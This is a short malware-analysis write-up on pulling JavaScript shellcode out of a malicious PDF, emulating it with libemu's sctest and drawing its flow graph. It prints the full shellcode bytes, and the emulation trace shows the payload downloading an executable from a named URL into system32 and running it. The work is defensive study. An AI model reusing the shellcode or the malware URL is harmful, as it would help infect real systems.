libemu and extracting shellcodes from pdf malware
Using libemu to create malware flow graph
Muhammad Najmi Ahmad∗
Abstract
In this paper I basically just document my personal experience, that is, the process of extracting shellcodes from PDF malware and later putting them into a Graphviz picture. I adapt most of the examples from the tutorial given by [Jeremy, 2008].
1 Introduction
In this write-up I will show you how to extract shellcodes from PDF files.
2 PDF malware
A malicious PDF contains embedded JavaScript (*.js). This JavaScript may do harmful activity without the user's consent.
3 Steps to extract shellcodes
3.1 Tools of trade
What we need to do is basically use existing tools. For now I suggest you download the following tools:
• http://code.google.com/p/pyew/
• http://libemu.carnivore.it/
• http://www.graphviz.org/
3.2 Extracting the shellcode
I used pdf_example.py from the pyew package.

    $ ls pdf_example.py -l
    -rwxr-xr-x 1 najmi najmi 1497 2010-03-30 20:03 pdf_example.py

Given that I have a PDF malware fetched from the wild:
∗Thanks to my wife, for providing hot coffee!
    $ avgscan bc66fd9e0c2f7a79167dab16531c28f2
    AVG command line Anti-Virus scanner
    Copyright (c) 2009 AVG Technologies CZ
    Virus database version: 271.1.1/2834
    Virus database release date: Sun, 25 Apr 2010 14:31:00 +08:00
    bc66fd9e0c2f7a79167dab16531c28f2 Virus found Script/Exploit
    Files scanned : 1(1)
    Infections found : 1(1)
    PUPs found : 0
    Files healed : 0
    Warnings reported : 0
    Errors reported : 0

Using the pyew tool mentioned in Section 3.1 above, I manually took out the intended, garbled-looking shellcode, which contains the following strings:
Figure 1: PDF shellcodes in Pyew tool
Now let us look at the strings. Take out the strings between the unescape() brackets and save them somewhere with a text editor.
Figure 2: PDF shellcodes (Zoom mode)
Now, we need to filter out the unintended strings; simply cut them out using the following perl one-liner, which turns each %uXXYY escape into its two bytes (low byte first):

    cat shell.txt | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > filtered-shell.txt
Now you should get the intended shellcode. You can actually see a plain URL within that PDF shellcode, say, by using the hexdump tool:
    $ hexdump -C filtered-shell.txt
    00000000  90 90 90 90 90 90 eb 0f  5b 33 c9 66 b9 80 01 80  |........[3.f....|
    00000010  33 11 43 e2 fa eb 05 e8  ec ff ff ff 81 75 b0 21  |3.C..........u.!|
    00000020  11 11 11 9a 51 1d 9a 61  0d bc 9a 61 19 90 fd 11  |....Q..a...a....|
    00000030  15 11 11 9a fd 47 79 9f  5f 1f fd f9 ef 11 11 11  |.....Gy._.......|
    00000040  98 54 15 47 79 89 ef 9b  1f f9 e1 11 11 11 98 54  |.T.Gy..........T|
    00000050  19 47 79 34 a1 ee d3 f9  f3 11 11 11 98 54 1d 47  |.Gy4.........T.G|
    00000060  79 fe df f1 71 f9 c5 11  11 11 98 54 01 47 79 d0  |y...q......T.Gy.|
    00000070  68 f4 a9 f9 d7 11 11 11  98 54 05 51 91 29 d2 64  |h........T.Q.).d|
    00000080  eb 98 54 09 f8 16 10 11  11 4f 98 64 35 9a 54 15  |..T......O.d5.T.|
    00000090  7b 10 48 9a 44 09 47 f9  9a 11 11 11 41 79 27 0b  |{.H.D.G.....Ay'.|
    000000a0  3e 61 f9 86 11 11 11 98  54 0d 9a d4 92 d1 41 98  |>a......T.....A.|
    000000b0  54 31 79 ee 11 11 11 41  9a 54 05 7b 13 48 9a 44  |T1y....A.T.{.H.D|
    000000c0  09 f9 70 11 11 11 12 54  31 d6 11 4d 6f 3f 74 d6  |..p....T1..Mo?t.|
    000000d0  51 15 69 74 11 11 ee 64  31 9a 54 1d 7b 10 48 9a  |Q.it...d1.T.{.H.|
    000000e0  44 09 f9 51 11 11 11 7b  16 49 12 54 35 22 ca 42  |D..Q...{.I.T5".B|
    000000f0  42 ee 64 31 41 42 9a 54  0d 7b 14 48 9a 44 09 f9  |B.d1AB.T.{.H.D..|
    00000100  32 11 11 11 7b 11 ee 64  31 9a 54 19 7b 13 48 9a  |2...{..d1.T.{.H.|
    00000110  44 09 f9 01 11 11 11 7b  ee 9a 54 01 7b 10 48 9a  |D......{..T.{.H.|
    00000120  44 09 f9 11 11 11 11 50  4a 43 12 f0 12 f0 12 f0  |D......PJC......|
    00000130  12 f0 92 fd 15 4b 42 9a  cb f3 e6 43 ee f1 44 9a  |.....KB....C..D.|
    00000140  fd 9a 6c 19 9a 4c 1d 47  9a 62 2d 9a 65 0f 69 12  |..l..L.G.b-.e.i.|
    00000150  e2 47 9a 67 31 12 e2 22  d8 58 50 bc 12 d2 47 22  |.G.g1..".XP...G"|
    00000160  e7 1e af 01 2b e3 65 19  d0 df 1c 12 e3 51 fa e0  |....+.e......Q..|
    00000170  2a ef 4f 64 f4 4b 9a fa  9a 4b 35 12 cc 77 9a 1d  |*.Od.K...K5..w..|
    00000180  5a 9a 4b 0d 12 cc 9a 15  9a 12 d4 4f 4c d3 19 11  |Z.K........OL...|
    00000190  f9 e5 ef ee ee 44 43 5d  5c 5e 5f 11 68 74 74 70  |.....DC]\^_.http|
    000001a0  3a 2f 2f 62 75 74 65 72  69 6b 2e 63 6f 6d 2f 31  |://buterik.com/1|
    000001b0  32 33 2f 6c 6f 61 64 2e  65 78 65 00 0a           |23/load.exe..|
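The decoding step above, as an added example that is not the paper's code: a Python equivalent of the perl one-liner that also accepts the %XX form unescape() understands and ignores the surrounding JavaScript, plus a strings-style scan that surfaces the plain URL the text mentions. The sample input is constructed from the bytes in the hexdump above.

```python
import re
import string

# Constructed sample: the first 16 bytes of the dump on the page and its trailing
# URL bytes, escaped the way the PDF's JavaScript carries them (%uXXYY, low byte
# first), wrapped in the unescape() call the text says to cut them out of.
SAMPLE = ('unescape("%u9090%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001" + '
          '"%u7468%u7074%u2f3a%u622f%u7475%u7265%u6b69%u632e%u6d6f%u312f'
          '%u3332%u6c2f%u616f%u2e64%u7865%u0065")')

_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def decode_unescape(text):
    """Bytes that JavaScript's unescape() would produce for this text.

    %uXXYY is a 16-bit code unit stored little-endian, so the perl one-liner's
    chr(hex($2)).chr(hex($1)) order is kept; %XX (which the one-liner skips) is
    a single byte. Quotes, '+', whitespace and the unescape( ) wrapper are
    ignored, which is the manual "cut out the unintended strings" step.
    """
    out = bytearray()
    for m in _TOKEN.finditer(text):
        if m.group(1):
            unit = int(m.group(1), 16)
            out += bytes([unit & 0xFF, unit >> 8])
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)

# Printable ASCII minus control whitespace (space itself stays).
_PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

def printable_strings(data, minlen=4):
    """strings(1)-style scan: runs of printable ASCII at least minlen long.
    This is what makes the download URL visible in the raw shellcode."""
    found, run = [], bytearray()
    for b in data + b"\x00":          # sentinel flushes the final run
        if b in _PRINTABLE:
            run.append(b)
            continue
        if len(run) >= minlen:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found

if __name__ == "__main__":
    raw = decode_unescape(SAMPLE)
    print(len(raw), "bytes, starts", raw[:8].hex())
    print(printable_strings(raw))
```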
Now, we need to call libemu's tool called sctest, using the following command:

    sctest -Sgs 1000000 -v < filtered-shell-.txt

It will create the following output:

    verbose = 1
    success offset = 0x00000017
    Hook me Captain Cook!
    userhooks.c:132 user_hook_ExitThread
    ExitThread (-1)
    stepcount 314316
    HMODULE LoadLibraryA (
         LPCTSTR lpFileName = 0x00417195 =>
               = "URLMON";
    ) =  0x7df20000;
    UINT GetSystemDirectory (
         LPTSTR lpBuffer = 0x0012fae8 =>
               = "c:\WINDOWS\system32";
         UINT uSize = 255;
    ) =  19;
    ERROR DeleteFile (
         LPCTSTR lpFileName = 0x0012fae8 =>
               none;
    ) =  -1;
    HRESULT URLDownloadToFile (
         LPUNKNOWN pCaller = 0x00000000 =>
               none;
         LPCTSTR szURL = 0x0041719c =>
               = "http://buterik.com/123/load.exe";
         LPCTSTR szFileName = 0x0012fae8 =>
               = "c:\WINDOWS\system32\~.exe";
         DWORD dwReserved = 0;
         LPBINDSTATUSCALLBACK lpfnCB = 0;
    ) =  0;
    UINT WINAPI WinExec (
         LPCSTR lpCmdLine = 0x0012fae8 =>
               = "c:\WINDOWS\system32\~.exe";
         UINT uCmdShow = 0;
    ) =  32;
    void ExitThread (
         DWORD dwExitCode = -1;
    ) =  0;

Now, if you want to create a flow graph, we need to add an extra flag, -G, to the tool's execution:

    sctest -Sgs 1000000 -v -G shell.dot < filtered-shell-bc66fd9e0c2f7a79167dab16531c28f2.txt

Next, execute the dot command (from the Graphviz package):

    dot shell.dot -Tpng -o shell.png
This will create a PNG file which contains the following graph:

[Figure: flow graph of the shellcode rendered from shell.dot, not reproduced here]
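As an added example (not from the paper or from libemu), a small parser for the sctest -v trace shown above that turns each API call into a record and flags the download-then-execute chain the trace exhibits (URLDownloadToFile writing a path that WinExec later runs). The sample trace is constructed from the page's listing.

```python
import re

# Constructed sample in the layout sctest -v prints: the download/execute part of the trace on the page.
SCTEST_OUTPUT = r"""
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
           none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://buterik.com/123/load.exe";
     LPCTSTR szFileName = 0x0012fae8 =>
           = "c:\WINDOWS\system32\~.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fae8 =>
           = "c:\WINDOWS\system32\~.exe";
     UINT uCmdShow = 0;
) =  32;
"""

_CALL = re.compile(r"^\S.*?\b(\w+) \($")                 # "HRESULT URLDownloadToFile ("
_ARG = re.compile(r"^\s+\w+ (\w+) = (\S+?)(?:;| =>)$")    # "LPCTSTR szURL = 0x0041719c =>"
_STR = re.compile(r'^\s+= "(.*)";$')                      # '= "http://...";' under a pointer
_RET = re.compile(r"^\) =\s*(\S+);$")                     # ") =  0;"

def parse_sctest(text):
    """Turn an sctest -v API trace into [{'api', 'args', 'ret'}, ...].
    A string printed under a pointer argument replaces that argument's value."""
    calls, arg = [], None
    for line in text.splitlines():
        if m := _RET.match(line):
            calls[-1]["ret"] = m.group(1)
        elif m := _CALL.match(line):
            calls.append({"api": m.group(1), "args": {}, "ret": None})
        elif m := _ARG.match(line):
            arg = m.group(1)
            calls[-1]["args"][arg] = m.group(2)
        elif m := _STR.match(line):
            calls[-1]["args"][arg] = m.group(1)
    return calls

def download_exec_chain(calls):
    """Drop-and-run: (url, path, api) where a path URLDownloadToFile wrote is later run by WinExec."""
    dropped = {c["args"].get("szFileName"): c["args"].get("szURL")
               for c in calls if c["api"] == "URLDownloadToFile"}
    return [(dropped[c["args"]["lpCmdLine"]], c["args"]["lpCmdLine"], c["api"])
            for c in calls
            if c["api"] == "WinExec" and c["args"].get("lpCmdLine") in dropped]
```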
References
[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.